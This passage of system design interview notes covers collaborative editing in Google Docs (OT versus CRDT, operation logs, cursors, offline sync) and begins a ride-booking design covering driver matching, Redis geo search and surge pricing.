Key Insight: The client applies the operation locally BEFORE the server ACK. This is what makes Google Docs feel instant. In a chat app, the message is stored server-side first. In a text editor, visual latency matters more than consistency — you must feel that your keystroke registered immediately.

Reliable Path (Durability-Optimized)

The OT Server writes the operation to Cassandra before broadcasting to peers. If the server crashes mid-broadcast, operations are never lost — they are replayed from the log on reconnect. The Kafka stream drives background snapshot creation without blocking the critical path.

Reconnect flow:

Client reconnects with last_applied_version = 142
Server queries Cassandra: all ops for doc_id X where version > 142
Server sends missed operations to client
Client applies them in order, transforming against any pending local ops

Key difference from chat systems: In Google Docs, the CLIENT applies the operation before the server ACK. In a chat app, the server stores the message first. This reflects the priority difference — in docs, visual latency matters more than consistency; in chat, message durability matters more than render speed.

6.4 Versioning (Operations Log + Snapshots = Event Sourcing)

[!NOTE]
Key Insight: Google Docs versioning is identical to the Event Sourcing pattern. The Operations Log is the event store. Document snapshots are materialized views. To reconstruct any historical state: fetch the nearest snapshot before the target version, then replay operations forward.

Operations Log Schema (Cassandra)

Table: document_operations

Partition key:  doc_id          UUID
Clustering key: version         BIGINT  (ascending)

Columns:
  op_type     TEXT        -- "insert" | "delete"
  position    INT
  content     TEXT        -- character(s) inserted
  user_id     UUID
  client_id   UUID
  timestamp   TIMESTAMP

Why Cassandra?

Append-only write pattern — operations are never updated, only inserted. Cassandra's LSM-tree is optimized for append-heavy workloads.
Partition by doc_id — all operations for a document are co-located on the same partition, enabling fast sequential reads for replay.
High write throughput — Cassandra handles millions of writes/sec natively with tunable consistency.

Snapshot Lifecycle

Version Restore Algorithm

1. User requests restore to version V
2. Query: SELECT MAX(snapshot_version) WHERE doc_id = X AND snapshot_version <= V
3. Fetch snapshot binary from S3 (via CDN if recent)
4. Query: SELECT op FROM document_operations
          WHERE doc_id = X
            AND version > snapshot_version
            AND version <= V
5. Apply each operation in order to the snapshot base state
6. Return reconstructed document

Storage optimization: Raw operations are retained for 30 days. After 30 days, old operations are compacted — the snapshot becomes the source of truth and individual ops are deleted. Users can still view the version (via snapshot) but cannot replay individual keystrokes.

6.5 Cursor and Presence

Cursor state is ephemeral — it has a natural expiry when the user stops moving or disconnects. Storing cursor positions in a relational database would add unnecessary write amplification for data that expires within seconds.

Cursor Flow

Redis Cursor Schema

Key:   cursor:{doc_id}
Type:  Hash
Field: {user_id}
Value: { pos: 29, selection: {start: 29, end: 35}, color: "#FF6B6B", ts: 1709123456 }
TTL:   30 seconds (refreshed on each cursor update)

[!NOTE]
Key Insight: Presence is ephemeral — Redis with TTL handles cleanup automatically. When a user disconnects without sending an explicit "offline" event (e.g., browser tab killed), the TTL ensures the cursor entry expires within 30 seconds. Storing cursor/presence state in PostgreSQL would require a background cleanup job to purge stale rows. Redis TTL is the correct primitive for data with natural expiry.

Presence State Machine

7. ⚖️ Key Trade-offs

Trade-off 1: OT vs CRDT

Aspect	OT	CRDT
Control	Centralized — one server imposes total order	Distributed — peers merge independently
Complexity	Medium — transform function per op-type pair	High — tombstoning, compaction, vector clock GC
Ordering	Required — server version number is the total ordering	Not required — operations are commutative by design
Offline support	Hard — server reconciliation required on reconnect	Native — any peer merges any op set in any order
Data structures	Linear text only — transform rules don't generalize	Arbitrary — Automerge handles JSON trees, shapes
Integration with auth/versioning	Natural fit — central server already exists	Requires retrofitting — designed for no-server topologies
Tombstone overhead	None	Required — deleted chars stay as markers until GC

Chosen for this design: OT.
One-line reason: a central server is already required for access control, versioning, and billing — OT's single-ordering-point requirement is not an additional constraint. CRDT's primary advantage (no central server) is irrelevant when the central server already exists.

Where to Use OT vs CRDT vs Both — The Honest Answer

[!IMPORTANT]
Google Docs historically used OT (Google Wave / Jupiter algorithm, 2009). Whether the current production system uses pure OT, CRDT, or a hybrid is not publicly confirmed by Google. The original design is well-documented. The current design at Google's scale — billions of documents, offline Android/iOS apps, multi-region — may have evolved. Claiming certainty either way is incorrect.

Use Case	Right Choice	Reason
Real-time online collaborative editing, < 100ms latency	OT	Central server already exists; low complexity; fast path
Mobile offline editing (hours or days offline)	CRDT	Reconnect reconciliation without server round-trip; offline ops merge natively
Multi-region active-active (no single "home" region)	CRDT	OT's single ordering server becomes a cross-region bottleneck
Structured data (shapes, JSON trees, embedded objects)	CRDT (Automerge-style)	OT transform functions don't generalize beyond linear text
Comments, suggestions, presence metadata	CRDT or last-write-wins	Not linear text; central ordering less critical
Short offline windows (< 1 min), server always reachable	OT	Reconnect is a simple log catch-up; CRDT overhead not justified

Can Google use both? Yes — and this is the likely direction at scale:

Layer 1: Real-time online editing (happy path)
  → OT Server handles the live session
  → All clients connected → central ordering → < 100ms latency

Layer 2: Offline / multi-device reconciliation (cold path)
  → Mobile app goes offline for hours
  → On reconnect: large divergence window → CRDT-style merge
  → Treat offline edits as concurrent CRDT ops; server applies merge rules

Layer 3: Structured content (comments, embedded objects, JSON)
  → These are not linear text — OT transform rules don't cover them
  → JSON CRDT (Automerge) handles arbitrary data structures natively

This is a hybrid architecture: OT for the hot real-time path, CRDT for the cold/offline path and non-text data. Neither algorithm alone handles all cases at Google's scale and product surface.

Signal	Choose OT	Choose CRDT
Server topology	Central server already exists	Peer-to-peer or multi-master
Offline window	Short (seconds to minutes)	Long (hours, days, mesh networks)
Data model	Linear text	Arbitrary structures (JSON, vector graphics)
Team / maintenance	Small team, correctness priority	Large infra team comfortable with compaction and GC
Real-world: text editors	Google Docs (historically), Notion, Quip	VS Code Live Share (Yjs), GitHub Copilot Workspace (Automerge)

[!IMPORTANT]
OT = simpler but centralized. CRDT = distributed but carries tombstone and compaction cost.
The correct answer in an interview is not "use OT" or "use CRDT" — it is: "OT for the real-time hot path where a central server already exists; CRDT for offline reconciliation and non-text structured data where distributed merge is genuinely required."

[!NOTE]
Key Insight: The reason to know CRDT deeply is not to argue for replacing OT. It is to design the offline and structured-data layers correctly — the layers where OT's central ordering requirement becomes a bottleneck rather than a free constraint.

Trade-off 2: WebSocket vs HTTP Long-Polling vs SSE

Dimension	WebSocket	Long-Polling	SSE
Bidirectional	Yes	Simulated (2 connections)	No (server-to-client only)
Latency	Lowest — persistent connection	High — new HTTP request per message	Low — persistent, but client cannot push
Infrastructure complexity	Sticky routing required; stateful	Stateless — any node	Stateless
Real-time op delivery	Native	Possible but wasteful	Cannot receive client ops

Chosen: WebSocket.
One-line reason: collaborative editing requires both the client pushing operations and the server pushing transforms — true bidirectional communication is mandatory.

[!NOTE]
Key Insight: The WebSocket sticky routing requirement (each client for a doc_id must connect to the same OT Server node) is a direct consequence of OT's single-ordering-point requirement. It is not a weakness of WebSocket — it is the architecture expressing the correctness constraint of OT.

Trade-off 3: Delta Operations vs Full Document Replacement

Dimension	Delta Operations	Full Document Replacement
Payload size	~200 bytes per op	~50 KB per keystroke
Concurrent edit safety	OT/CRDT ensures convergence	Last-writer-wins — silent data loss
Network throughput at 1M editors	~1 GB/sec (manageable)	~250 TB/sec (catastrophic)
Reconnect catch-up	Replay missed ops from log	Fetch current document snapshot

Chosen: Delta operations.
One-line reason: full document replacement causes both catastrophic bandwidth usage and silent data loss under concurrent edits.

Trade-off 4: At-Least-Once vs Exactly-Once Delivery

Dimension	At-Least-Once	Exactly-Once
Complexity	Low	High — requires distributed transactions
Risk	Duplicate operations (detectable)	None
Mitigation	Idempotency via client_id + version dedup	Not needed
Latency impact	Minimal	Adds 2PC overhead on critical path

Chosen: At-least-once with idempotency.
One-line reason: exactly-once delivery requires 2PC or Saga patterns that add latency on the critical edit path. Deduplicating by (client_id, version) on the OT server catches all duplicates at negligible cost.

[!NOTE]
Key Insight: At-least-once delivery is safe in OT because each operation carries a version and client_id. The OT server detects and drops duplicates in O(1) using a Redis SET with TTL. The operations log in Cassandra provides the durable deduplication record for longer windows.

8. Interview Summary

Decision Table

Decision	Problem It Solves	Trade-off Accepted
Delta operations (not file replacement)	Catastrophic bandwidth; concurrent write data loss	Requires conflict resolution algorithm
Operational Transformation (OT)	Concurrent edits produce divergent documents	Requires single central ordering server per document
WebSocket (not HTTP)	Server must push transformed ops to all peers	Sticky routing required; stateful infrastructure
Cassandra for operations log	5M writes/sec; append-only; partition by doc_id	Eventual consistency on reads (acceptable for log replay)
Redis for cursors/presence with TTL	Cursor data is ephemeral; DB writes would be wasteful	Not durable — cursor state lost on Redis failover (acceptable)
S3 + CDN for document snapshots	Fast initial load for large documents; CDN caches globally	Eventual consistency between snapshot and live ops
Optimistic local apply	Users must feel keystrokes are instant	Client must handle rollback if server rejects op (rare)
Kafka for snapshot pipeline	Decouple snapshot creation from OT critical path	Small lag between committed ops and snapshot availability

Mental Model Summary

Google Docs is a two-path system. The fast path optimistically applies every keystroke locally, ships it over a persistent WebSocket to an OT Server that transforms it against any concurrent operations, then fans it out to all collaborators. The reliable path appends every operation to an immutable Cassandra log before the ACK is sent, enabling replay, versioning, and reconnect recovery. The hardest problem is concurrent edit reconciliation: OT requires a single central server to serialize operations and apply transformation functions that adjust character positions across all concurrent operations. Cursor positions are ephemeral and stored in Redis with TTL. Document history is event-sourced: snapshot + operation replay reconstructs any historical state.

Key Insights Checklist

OT requires a single central server per document — this is a correctness requirement, not an architectural weakness. Without a single ordering point, two nodes could transform the same concurrent ops in different orders, producing permanently divergent documents.
The client applies keystrokes locally before the server ACK — this optimistic apply is what makes Google Docs feel instant. The server transforms and confirms asynchronously; the client reconciles silently.
OT for the hot path, CRDT for the cold path — OT is right for real-time editing where a central server already exists. CRDT is right for long offline windows, multi-region without a home region, or non-text structured data (JSON, shapes). Google's production system likely uses both. Neither algorithm alone handles all cases at scale.
CRDT merge works by unique IDs, not integer positions — each character gets a permanent unique identity. An op says "insert after id=X", not "insert at position N". Positions shift; IDs don't. This is why CRDT needs no server to resolve conflicts — the merge is self-describing.
CRDT's hidden cost is tombstoning — deleted characters cannot be physically removed until every peer confirms the deletion. Heavily-edited documents accumulate invisible tombstones that require periodic compaction. OT has no tombstoning because the server is always the authority — deletion is final immediately.
Cursor data belongs in Redis, not a database — it is ephemeral, high-frequency, and has a natural TTL. Storing it in PostgreSQL or Cassandra would add write amplification for data that expires in 30 seconds anyway.
Versioning is event sourcing — the operations log is the event store; snapshots are materialized views. Restore = nearest snapshot + operation replay. This pattern provides both durable history and efficient current-state access.

Frontend Notes: Google Docs

Complexity split: Backend 65%, Frontend 35%

The backend carries the majority of the design weight: OT engine correctness, operations log durability, WebSocket fan-out, and snapshot management. However, the frontend in Google Docs is significantly more complex than a typical web application. The client runs a partial OT engine, manages an optimistic local document model, handles offline buffering, and renders collaborative cursors in real time. These are non-trivial engineering problems that warrant dedicated discussion in a system design interview.

F1: Client-Side OT (The Hardest Frontend Problem)

The client is not a passive receiver of server operations. It runs its own OT transformation engine to reconcile incoming remote operations against locally pending (not-yet-ACKed) operations.

Why this is necessary:

Suppose the client sends op A to the server. While waiting for the ACK, the user types op B locally. Before the server ACKs A, a remote op C arrives from another collaborator. C was generated against the server's state before A was committed. But locally, the document already has A and B applied. The client must transform C against both A and B before applying it — otherwise C will be applied at the wrong position.

Client OT State Machine:

State variables maintained by the client:

local_doc:       Current in-memory document model (all local ops applied)
committed_doc:   Last server-confirmed document state
pending_ops:     Queue of ops sent but not yet ACKed by server
buffered_ops:    Ops typed while previous op is in-flight
local_version:   Client's current version count
server_version:  Last confirmed server version

Incoming remote op processing:

function applyRemoteOp(remote_op):
    // remote_op was generated against server_version V
    // pending_ops contains all local ops with version > V
    transformed = remote_op
    for each pending_op in pending_ops:
        transformed = transform(transformed, pending_op)
    apply(transformed, local_doc)
    // adjust all collaborator cursors for this operation
    for each cursor in remote_cursors:
        cursor.pos = transformPosition(cursor.pos, transformed)

[!NOTE]
Key Insight: The client OT engine transforms incoming remote ops against the client's pending (unACKed) local ops — not against all local ops. Only unACKed ops are "invisible" to the server. ACKed ops are already reflected in the server's state and thus in the remote op's base version.

F2: Offline Editing

Google Docs supports continued editing when the network is unavailable. The client buffers operations locally and synchronizes on reconnect.

Offline flow:

IndexedDB schema for offline buffer:

Store: offline_ops
  doc_id:     String
  op:         Object (full operation delta)
  local_seq:  Number (local ordering)
  timestamp:  Number

Reconnect reconciliation: On reconnect, the server may have received operations from other collaborators during the offline period. The client's buffered ops must be transformed against all server ops that committed during the offline window. This is the same transform logic as online — the only difference is that the gap between last_known_server_version and current_server_version may be large.

[!NOTE]
Key Insight: Offline editing is where CRDT has a natural advantage — CRDTs merge offline changes without a server round-trip. With OT, the server must be involved in reconciling offline ops. For Google Docs (which already has a central server), this is acceptable. The reconnect transform is the same algorithm as normal online operation, just with a larger operation gap.

F3: Cursor Rendering

Rendering collaborative cursors involves three problems: position tracking, color assignment, and position adjustment when remote operations arrive.

Color assignment: On WebSocket session join, the server assigns a unique color per (user_id, doc_id, session). The color is consistent across all clients in the session — all users see Alice's cursor as the same color.

Cursor DOM rendering:

- Each collaborator's cursor is an absolutely-positioned CSS pseudo-element
- Cursor position = character offset in the ProseMirror / Quill document model
- Name label floats above the cursor line (CSS tooltip, hidden after 3s of inactivity)
- Selection ranges rendered as semi-transparent background color fills

Cursor position adjustment on remote op:

function adjustCursorsForOp(op, cursors):
    for each (user_id, cursor) in cursors:
        if op.type == "insert" and cursor.pos >= op.pos:
            cursor.pos += 1
        if op.type == "delete" and cursor.pos > op.pos:
            cursor.pos -= 1
        if op.type == "delete" and cursor.pos == op.pos:
            cursor.pos = op.pos   // cursor collapses to deletion point

Debouncing: Cursor position updates are debounced to 50ms before sending to the server. At 5 collaborators each moving cursors continuously, this keeps cursor broadcast traffic under 100 messages/sec — negligible compared to operation traffic.

F4: Optimistic UI and Rollback

Optimistic apply means the client mutates the local document model immediately on every keystroke, without waiting for the server to ACK the operation. The user sees their change reflected in under 1ms (local JS execution) rather than in 50-100ms (network round-trip).

Rollback (rare):

The server can reject an operation if:

The operation's base version is too old (client was offline too long and the transform gap is unresolvable)
The user lost editing permission mid-session
A server-side validation failure (e.g., document size limit exceeded)

On rejection:

1. Remove rejected op from pending_ops
2. Undo all local ops applied after the rejected op (in reverse order)
3. Apply the server's authoritative state
4. Re-apply any subsequent buffered ops that are still valid
5. Display subtle "sync error" indicator if reconciliation fails

In practice, rollback is extremely rare (less than 0.01% of operations). The architecture optimizes for the 99.99% case where the op is accepted and the ACK arrives within 100ms.

[!NOTE]
Key Insight: Optimistic UI requires a local undo stack that is separate from the user-facing Ctrl+Z undo history. The internal rollback stack tracks unACKed ops for reconciliation purposes. The user-facing undo history tracks logical editing intent. Conflating them would cause Ctrl+Z to undo server reconciliation adjustments that the user never consciously made.

Ride Booking (Uber / Ola)

Arghya Majumder — Fri, 27 Mar 2026 22:54:15 +0000

System Design: Ride Booking (Uber / Rapido)

1. Problem + Scope

Design a ride-booking platform (Uber / Rapido) supporting fare estimation, driver matching, real-time location tracking, and payment — at millions of concurrent users and drivers.

In Scope: Fare estimation, ride booking, driver matching, real-time location tracking (rider and driver), trip start/end, ratings, payments, surge pricing.

Out of Scope: Driver onboarding, fleet management, surge zone boundary drawing, fraud detection internals, driver incentive programs.

2. Assumptions & Scale

Inputs:
  Total drivers online:       5 million
  Daily rides:                20 million
  Peak concurrent requests:   500,000
  Location update frequency:  every 1s (ON_TRIP), every 2s (RESERVED), every 5s (IDLE)

Location writes/sec:
  5M drivers x (1 update / 3s avg) = ~1.67M writes/sec -> Redis must handle this

WebSocket connections (peak):
  5M drivers + ~2M active riders = ~7M persistent connections

Trip events/sec (Kafka):
  20M rides/day / 86,400s = ~232 events/sec (well within Kafka capacity)

Storage:
  Trip record: ~1 KB x 20M rides/day = 20 GB/day (PostgreSQL)
  Location history (waypoints): ~500 GPS points x 16B x 20M trips = ~160 GB/day (cold)
  Driver metadata: 5M drivers x 1 KB = 5 GB (static, fits in memory)

Bandwidth comparison:
  Location update frame (WebSocket): ~20 bytes
  Location update frame (HTTP polling): ~2 KB (headers + body)
  At 1.67M updates/sec: WebSocket = 33 MB/s vs HTTP = 3.3 GB/s -> WebSocket wins 100x

These numbers drive the following decisions: Redis for geospatial search (not PostGIS), WebSocket (not HTTP polling), Kafka for fan-out (not direct server-to-server calls), and state-adaptive location frequency (not a fixed 1s tick).

3. Functional Requirements

Rider gets a fare estimate (per vehicle type) for a pickup and drop location
Rider books a ride; system matches a nearby available driver within 60 seconds
Driver accepts or denies the ride offer (15-second window)
Both rider and driver track each other on a live map
Trip starts and ends; fare is finalized and payment is processed
Rider and driver rate each other after trip completion
Rider can cancel a ride before driver arrival; driver can cancel before trip start

4. Non-Functional Requirements

Requirement	Target
Latency — driver matching	< 300ms to dispatch first offer
Latency — location update visible to rider	< 2s end-to-end
Availability (rider-facing)	99.9% — app down = revenue loss
Consistency (driver assignment)	Strong — a driver must never be assigned to two rides simultaneously
Durability (trip + billing data)	Zero loss — replicated DB + Kafka retention
Location update throughput	1.67M writes/sec sustained
WebSocket connections	7M concurrent at peak

Consistency Model by Component:

Component	Consistency	Why
Driver assignment (Redis WATCH/EXEC)	Strong	Prevents double-booking
Driver location (Redis Geo)	Eventual	Overwrites on next tick; ephemeral
Trip record (PostgreSQL)	Strong (ACID)	Financial correctness
Surge multiplier (Redis cache)	Eventual (60s TTL)	Slight staleness is acceptable
Ride history (read replica)	Eventual	Acceptable for non-real-time reads

[!IMPORTANT]
CAP Theorem framing: This system intentionally makes different consistency trade-offs per component. Rider-facing read services (fare estimate, history) prefer availability. Driver assignment prefers strong consistency. Stating this explicitly in an interview shows CAP awareness at a component level — not a single global answer.

5. 🧠 Mental Model

Uber is two concurrent real-time systems: location tracking and driver matching. Every 1–5 seconds, millions of drivers push their GPS coordinates into a geo-indexed in-memory store. When a rider requests a trip, the system finds the closest available driver by ETA (not distance), atomically assigns them via a state transition, and keeps both maps in sync — all under 300ms. The hardest problems are concurrency (preventing double-booking) and geospatial search at scale.

                ┌──────────────────────────────────────────────────────────────┐
                │                     FAST PATH                                 │
 ┌──────────┐  │  ┌───────────────┐  GEORADIUS   ┌──────────────┐             │
 │  Driver  │──►  │ Location Svc  │ ───────────► │ Match Engine │ ──► Driver  │
 │  App     │  │  │ (Redis Geo)   │              │ (top K score)│    notified  │
 └──────────┘  │  └───────────────┘              └──────┬───────┘             │
  every 1-5s   │                                        │ WATCH/MULTI/EXEC    │
               └────────────────────────────────────────┼─────────────────────┘
                                                         │
               ┌─────────────────────────────────────────▼────────────────────┐
               │                    RELIABLE PATH                               │
               │  Trip event ──► Kafka ──► Trip DB (PostgreSQL)                │
               │  (start, end, fare, route) — durable, for billing + history   │
               └──────────────────────────────────────────────────────────────┘

Core Design Principles

Path	Optimized For	Mechanism
Fast Path — matching	Latency (< 300ms end-to-end)	Driver WS → Redis GEOADD → GEORADIUS → WATCH/MULTI/EXEC → WS push to driver
Fast Path — live tracking	Low-latency map sync	Location Svc → Kafka → rider WebSocket (ON_TRIP only)
Reliable Path — billing	Durability (zero revenue loss)	trip_start / trip_end → Kafka → PostgreSQL (replicated)
Ephemeral data	Sub-ms reads, auto-expiry on disconnect	Driver state + location in Redis with TTL
Durable data	Correct billing, audit, replay	Trip events event-sourced into PostgreSQL via Kafka

[!IMPORTANT]
Driver location is fast path only. Location is overwritten every 1–5 seconds — only the latest value matters. Trip events are reliable path — they drive billing. Never conflate ephemeral real-time data (location) with durable transactional data (trip records).

[!NOTE]
Key Insight: Both paths run concurrently on every event — they are not sequential. The fast path can fail and self-heal. The reliable path must not fail. Redis TTL is not a weakness; it is the correct primitive for data with a natural expiry.

6. API Design

Rider APIs

Method	Path	Description
POST	/api/v1/rides/request	Request ride {pickup_lat, pickup_lng, dest_lat, dest_lng}, returns {ride_id, fare_estimate, eta}
GET	/api/v1/rides/{id}/status	Poll ride status + driver location
DELETE	/api/v1/rides/{id}	Cancel ride (before driver assigned)
POST	/api/v1/rides/{id}/rating	Rate driver post-ride

Driver APIs

Method	Path	Description
PUT	/api/v1/drivers/availability	Toggle online/offline with current location
POST	/api/v1/rides/{id}/accept	Accept dispatched ride request
PUT	/api/v1/rides/{id}/status	Update status: ARRIVED, STARTED, COMPLETED
POST	/api/v1/drivers/location	GPS ping {lat, lng} every 5s

[!NOTE]
Async matching design: POST /rides/request is synchronous only for fare estimation. Driver matching happens asynchronously — the client polls GET /rides/{id}/status. This is why the system can afford to try multiple drivers without blocking the rider.

7. End-to-End Flow

The story in plain English:

Rider taps "Request Ride" — sends POST /rides with pickup and destination coordinates.
Match Service queries Redis Geo: GEORADIUS drivers:idle:city 3km — returns all idle drivers sorted by distance.
Match Service filters by vehicle type, rating, and acceptance rate, then ranks by estimated ETA.
The top driver is atomically reserved in Redis using WATCH/MULTI/EXEC — this prevents two rides from being assigned to the same driver simultaneously (the classic race condition).
A push notification is sent to the driver's app: "New ride offer — 15 seconds to respond."
Driver accepts → Match Service locks the driver's state in Redis to RESERVED, and pushes a WebSocket event to the rider: "Driver assigned, ETA 4 min."
Real-time tracking begins. Driver app sends GPS pings every 1–2 seconds via WebSocket.
Location Service writes to Redis Geo (overwrites driver position) and publishes to Kafka. A consumer on the rider's server reads the Kafka event and pushes the updated position to the rider's app over WebSocket.
Driver arrives, starts trip → status set to ON_TRIP in Redis. Trip start event persisted to PostgreSQL via Kafka.
Driver ends trip → POST /rides/{id}/end with final distance. Fare is calculated and charged asynchronously via Payment Service (Kafka consumer).
Driver state returns to IDLE in Redis Geo pool — immediately available for the next ride.

╔═════════════════════════════════════════════════════════════════╗
║          UBER / RAPIDO — FULL RIDE BOOKING SEQUENCE                     ║
╚═════════════════════════════════════════════════════════════════╝

PHASE 1 — REQUEST & DRIVER MATCHING
──────────────────────────────────────────────────────────────────────────
  Rider      LB       Match     Redis    Notify    Driver
    │          │         │         │         │         │
    │─POST /rides────────►         │         │         │
    │          │─forward─►         │         │         │
    │          │         │         │         │         │
    │          │   ┌─ STEP 1: GEO SEARCH ──────────────────────────────┐
    │          │   │  GEORADIUS drivers:idle:city 3km COUNT 100         │
    │          │   └────────────────────────────────────────────────────┘
    │          │         │─GEORADIUS──►│         │         │
    │          │         │◄──[d001: 0.3km, d002: 0.7km]    │     │
    │          │         │         │         │         │
    │          │   ┌─ STEP 2: FILTER + ETA RANK ───────────────────────┐
    │          │   │filter: state=IDLE, vehicle type, rating     │
    │          │   │  rank: by ETA (not distance)                │
    │          │   └────────────────────────────────────────────────────┘
    │          │         │         │         │         │
    │          │   ┌─ STEP 3: ATOMIC ASSIGNMENT ───────────────────────┐
    │          │WATCH / MULTI / EXEC — prevents double booking    │
    │          │   └────────────────────────────────────────────────────┘
    │          │         │─WATCH───►│         │         │
    │          │         │─MULTI───►│         │         │
    │          │         │◄── EXEC OK (d001 → RESERVED) │         │
    │          │         │         │         │          │
    │          │         │─────────────push offer──────►│         │
    │          │         │         │         │─WS offer (15s)────►│
    │          │         │         │         │          │
    │          │◄─────────────────────────────d001: ACCEPT─────────│
    │          │─accepted►│        │         │         │
    │◄── WS: driver assigned, ETA 4 min ─────│         │         │
    │          │         │         │         │         │


PHASE 2 — REAL-TIME GPS TRACKING  (ON_TRIP)
──────────────────────────────────────────────────────────────────────────
  Driver    Loc Svc    Redis      Kafka      Rider
    │           │          │          │          │
    │─WS: lat/lng every 1s─►          │          │
    │           │─GEOADD───►│         │          │
    │           │  (overwrites previous position)│          │
    │           │─location_update───────►│       │
    │           │          │          │─WS: driver moved──►│
    │           │          │          │    (< 2s lag)      │
    │           │          │          │          │
    │  [driver taps Picked Up]         │         │
    │─PUT /orders/id/status─►          │         │
    │           │─status_changed────────►│       │
    │           │          │          │─WS: "Order picked up"──►│
    │           │          │          │          │


PHASE 3 — TRIP START → END → PAYMENT
──────────────────────────────────────────────────────────────────────────
  Driver     LB       Match     Redis     Kafka    PaySvc     DB
    │          │         │          │         │         │        │
    │─POST /rides/start───►         │         │         │        │
    │          │─────────►│         │         │         │        │
    │          │         │─SET ON_TRIP────►   │         │        │
    │          │         │─trip_start event────►│       │        │
    │          │         │         │         │──────────────────►│
    │          │         │         │         │         persist   │
    │          │         │         │         │         trip row  │
    │          │         │         │         │          │        │
    │─POST /rides/end─────►         │        │          │        │
    │          │─────────►│         │        │          │        │
    │          │         │─trip_end event──────►│       │        │
    │          │         │         │         │─charge rider──────►│  ← wait for OK
    │          │         │         │         │◄── payment OK ────│    
    │          │         │         │         │─finalize trip ────────────►│
    │          │         │─SET IDLE─►│         │          │     │
    │◄── WS: payment confirmed ───────────────────────────│     │
    │          │         │         │         │         │        │

8. High-Level Architecture

Simple Design

Evolved Design (with Kafka and Surge Pricing)

9. Data Model

Entity	Storage	Key Columns	Why this store
Driver live location	Redis Geo sorted set	drivers:idle:city → driver_id, lng, lat	1.67M writes/sec; ephemeral; sub-ms GEORADIUS queries
Driver state	Redis key-value with TTL	driver:state:driver_id → IDLE / RESERVED / ON_TRIP	Atomic WATCH/EXEC for double-booking prevention; TTL self-heals on disconnect
Trip record	PostgreSQL	trip_id, rider_id, driver_id, status, pickup, dropoff, fare, started_at, ended_at	ACID for financial correctness; strong consistency on fare and payment
Payment record	PostgreSQL	payment_id, trip_id, amount, status, method, created_at	ACID; joins with trip record for reconciliation
Surge multiplier	Redis key-value with TTL 60s	surge:geohash → multiplier float	Cache layer; 60s staleness acceptable; SC writes, RS reads
Ride request log	Analytics DB (Cassandra or BigQuery)	request_id, geohash, vehicle_type, timestamp	High-write analytics; feeds Surge Calculator; no ACID needed
Waypoints (GPS trace)	Object storage (S3)	waypoints/trip_id.jsonl	~160 GB/day; cold after trip ends; no random access needed
Driver metadata	PostgreSQL + Redis cache	driver_id, name, vehicle, rating, acceptance_rate	Static metadata; cached in Redis TTL 5m after first read
User / rider profile	PostgreSQL	user_id, name, phone, email, payment_method	Relational; infrequent writes; strong consistency on payment method

10. Deep Dives

7.1 Driver Matching with Geohash and Atomic Assignment

Here is the problem we are solving: when a rider requests a trip, find the best available nearby driver, offer them the ride, and assign atomically — without double-booking — in under 300ms. Five million drivers are in the pool. Naive: scan all drivers in the DB — impossible at scale.

Naive solution fails: A full-table scan of 5M driver rows per ride request at 500K peak requests/sec = 2.5 trillion row scans per second. No relational DB survives this.

Chosen solution — five-step pipeline:

Step 1: Geo index search     -> GEORADIUS -> top 100 candidates within 2km
Step 2: Eligibility filter   -> state=IDLE, vehicle type, rating, acceptance rate
Step 3: ETA-based ranking    -> call routing engine for top 20; score by ETA + quality
Step 4: Sequential dispatch  -> offer to top driver, 15s window; expand if exhausted
Step 5: Atomic state lock    -> WATCH/MULTI/EXEC: IDLE -> RESERVED atomically

Why H3 over plain geohash for production:

Geohash cells are rectangles — corner distances are longer than edge distances, causing search radius inconsistencies. Uber's H3 uses hexagons: every cell has exactly 6 equidistant neighbors, so "expand to adjacent cell" expands coverage uniformly in all directions. For this design, Redis built-in GEORADIUS (geohash-based) is acceptable; H3 is the production upgrade.

The atomic assignment — no separate lock service:

WATCH driver:state:driver_001
  current = GET driver:state:driver_001
  IF current != "IDLE": DISCARD  -- another server got here first
MULTI
  SET driver:state:driver_001  RESERVED  EX 30
  ZREM drivers:idle:bangalore  driver_001
EXEC
  -> nil  EXEC failed -- state changed between WATCH and EXEC, skip driver
  -> OK   atomic commit -- driver is RESERVED, removed from idle pool

Two servers racing to reserve the same driver: only one EXEC commits. The other gets nil and moves to the next candidate. No separate lock key. No lock service. The state is the truth.

Dispatch expansion:

Round 1: 2km, 2-min timeout  -- quality match (close driver, good ETA)
Round 2: 3km, 2-min timeout  -- balance quality + availability
Round 3: 5km, 2-min timeout  -- availability over quality
Round 4: fail request        -- "no driver found"

[!NOTE]
Key Insight: Matching is not about finding the nearest driver — it is about finding the fastest pickup. ETA is the metric, not distance. A driver 0.5km away in traffic has a worse ETA than one 1.2km away on an open road. Every system that ranks by distance is optimizing for the wrong thing.

[!IMPORTANT]
State machine replaces distributed locks. The atomic IDLE → RESERVED transition ensures a driver is either fully available or fully reserved — never both. No ZooKeeper, no Redlock, no DB row lock. The state is the truth.

7.2 Surge Pricing Algorithm

Here is the problem we are solving: at peak demand, more riders request rides than drivers are available. Without price adjustment, all riders compete for the same few drivers, matching fails, and drivers earn less. Surge pricing signals scarcity to both sides — it is a market-clearing mechanism, not a revenue grab.

Naive solution fails: Static per-km rates mean the same price during a 3am downpour as a sunny Tuesday morning. Matching rate drops. Rider wait times spike. Drivers have no incentive to come online.

Chosen solution — demand-signal feedback loop:

demand_ratio = active_ride_requests / idle_drivers_in_cell
multiplier:
ratio < 1.0 -> 1.0x (supply exceeds demand)
ratio 1.0-1.5 -> 1.2x
ratio 1.5-2.0 -> 1.5x
ratio 2.0-3.0 -> 2.0x
ratio > 3.0 -> 3.0x (capped -- prevents extreme pricing)


- Surge Calculator runs every 60 seconds, writes `surge:{geohash}` to Redis (TTL 60s)
- Ride Service reads the multiplier on each fare call (sub-ms Redis read)
- Rider sees the multiplier before confirming — informed consent (legal requirement in most markets)
- Surge does not affect matching logic — it only affects the fare shown to the rider

[!NOTE]
Key Insight: Surge pricing is a read-path concern only — it does not affect matching. The Surge Calculator is a separate service feeding data into Redis. The matching engine never reads it. Decoupling surge calculation from matching prevents a slow analytics query from blocking a 300ms matching window.

Trade-off — eventual consistency on surge: A 60-second Redis TTL means surge multiplier can be up to 60s stale. A rider booking 30 seconds after a demand spike may see the old price. This is acceptable: the fare shown at request time is the fare charged (contractual), and 60s staleness does not meaningfully harm either party.

7.3 Real-Time Location Write Architecture

Here is the problem we are solving: 1.67 million GPS updates arrive per second from driver devices. Each update must be indexed for sub-ms geospatial lookup. The rider tracking a trip must see the driver move smoothly on their map — but the rider and driver are on different backend servers.

Naive solution fails: Writing 1.67M rows/sec to a relational DB creates disk I/O saturation within minutes. Direct server-to-server WebSocket push (Server A to Server B) is impossible in a stateless distributed deployment.

Chosen solution — three-layer architecture:

